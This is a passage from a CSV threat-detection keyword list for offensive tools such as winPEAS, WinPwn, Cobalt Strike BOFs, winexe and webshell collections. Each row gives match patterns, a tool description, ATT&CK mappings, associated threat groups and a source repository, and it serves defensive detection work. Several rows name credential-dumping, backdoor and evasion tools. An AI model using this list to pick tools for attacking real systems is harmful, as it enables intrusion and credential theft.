Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","12610" "*/windows-resources/hyperion*",".{0,1000}\/windows\-resources\/hyperion.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12611" "*/WindowsVault.cna*",".{0,1000}\/WindowsVault\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - 
Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","12612" "*/WindowsVault.h*",".{0,1000}\/WindowsVault\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","12613" "*/win-enum-resources*",".{0,1000}\/win\-enum\-resources.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","12614" "*/winexe *--runas*",".{0,1000}\/winexe\s.{0,1000}\-\-runas.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","12615" "*/winexe -U *",".{0,1000}\/winexe\s\-U\s.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","12616" "*/winexe.git*",".{0,1000}\/winexe\.git.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","12617" "*/winexe-0.91.tar.gz*",".{0,1000}\/winexe\-0\.91\.tar\.gz.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - 
T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","12618" "*/winexe-1.00.tar.gz*",".{0,1000}\/winexe\-1\.00\.tar\.gz.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","12619" "*/WINHELLO2hashcat.py*",".{0,1000}\/WINHELLO2hashcat\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","12620" "*/win-key-killer.ps1*",".{0,1000}\/win\-key\-killer\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","12621" "*/winPEAS.exe*",".{0,1000}\/winPEAS\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","12622" 
"*/winPEAS.exe*",".{0,1000}\/winPEAS\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12623" "*/winPEAS.exe*",".{0,1000}\/winPEAS\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12624" "*/winPEAS.exe*",".{0,1000}\/winPEAS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","12625" "*/winPEAS.exe*",".{0,1000}\/winPEAS\.exe.{0,1000}","offensive_tool_keyword","winPEAS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12626" "*/winPEAS.ps1*",".{0,1000}\/winPEAS\.ps1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12627" "*/winPEASany.exe*",".{0,1000}\/winPEASany\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12628" "*/winPEASany.exe*",".{0,1000}\/winPEASany\.exe.{0,1000}","offensive_tool_keyword","winPEAS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12629" "*/winPEASany_ofs.exe*",".{0,1000}\/winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12630" "*/winPEASany_ofs.exe*",".{0,1000}\/winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12631" "*/winPEAS-Obfuscated.exe*",".{0,1000}\/winPEAS\-Obfuscated\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12632" "*/winPEASx64.exe*",".{0,1000}\/winPEASx64\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12633" "*/winPEASx86.exe*",".{0,1000}\/winPEASx86\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12634" "*/WinPirate.bat*",".{0,1000}\/WinPirate\.bat.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","12635" "*/WinPirate.git*",".{0,1000}\/WinPirate\.git.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","12636" "*/WinPwn*",".{0,1000}\/WinPwn.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - 
TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","12637" "*/WinPwn.git*",".{0,1000}\/WinPwn\.git.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","12638" "*/WinPwn_Repo*",".{0,1000}\/WinPwn_Repo.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","12639" "*/WinPwnage*",".{0,1000}\/WinPwnage.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","12640" "*/WinPwnage.git*",".{0,1000}\/WinPwnage\.git.{0,1000}","offensive_tool_keyword","WinPwnage","various 
exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12641" "*/winpwnage.py*",".{0,1000}\/winpwnage\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12642" "*/winregistry.py**",".{0,1000}\/winregistry\.py.{0,1000}.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","12644" "*/winrm.cpp*",".{0,1000}\/winrm\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - 
Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mez-0/winrmdll","1","1","N/A","N/A","10","10","144","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z","12645" "*/winrm.py*",".{0,1000}\/winrm\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","12646" "*/winrmdll*",".{0,1000}\/winrmdll.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mez-0/winrmdll","1","1","N/A","N/A","10","10","144","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z","12647" "*/winrm-reflective-dll/*",".{0,1000}\/winrm\-reflective\-dll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - 
Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mez-0/winrmdll","1","1","N/A","N/A","10","10","144","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z","12648" "*/winscp_dump.py*",".{0,1000}\/winscp_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12649" "*/Winsocky.git*",".{0,1000}\/Winsocky\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","N/A","10","10","98","18","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z","12650" "*/winsos.exe*",".{0,1000}\/winsos\.exe.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","12651" "*/winsos-poc.git*",".{0,1000}\/winsos\-poc\.git.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","12652" "*/WinX Shell.php*",".{0,1000}\/WinX\sShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12653" "*/wireless.py*",".{0,1000}\/wireless\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 